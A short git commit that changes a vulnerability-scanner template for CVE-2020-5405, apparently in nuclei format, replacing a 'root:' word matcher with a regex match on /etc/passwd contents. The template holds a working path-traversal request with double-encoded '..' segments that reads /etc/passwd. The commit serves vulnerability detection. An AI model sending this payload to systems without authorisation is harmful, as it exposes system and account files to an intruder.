Update CVE-2020-5405.yaml

patch-1
bauthard 2020-07-06 22:40:05 +05:30
parent ebcf1ec0f6
commit 8362fb3dc2
1 changed files with 5 additions and 4 deletions

View File

@ -11,11 +11,12 @@ requests:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:"
- type: regex
regex:
- "root:[x*]:0:0:"
part: body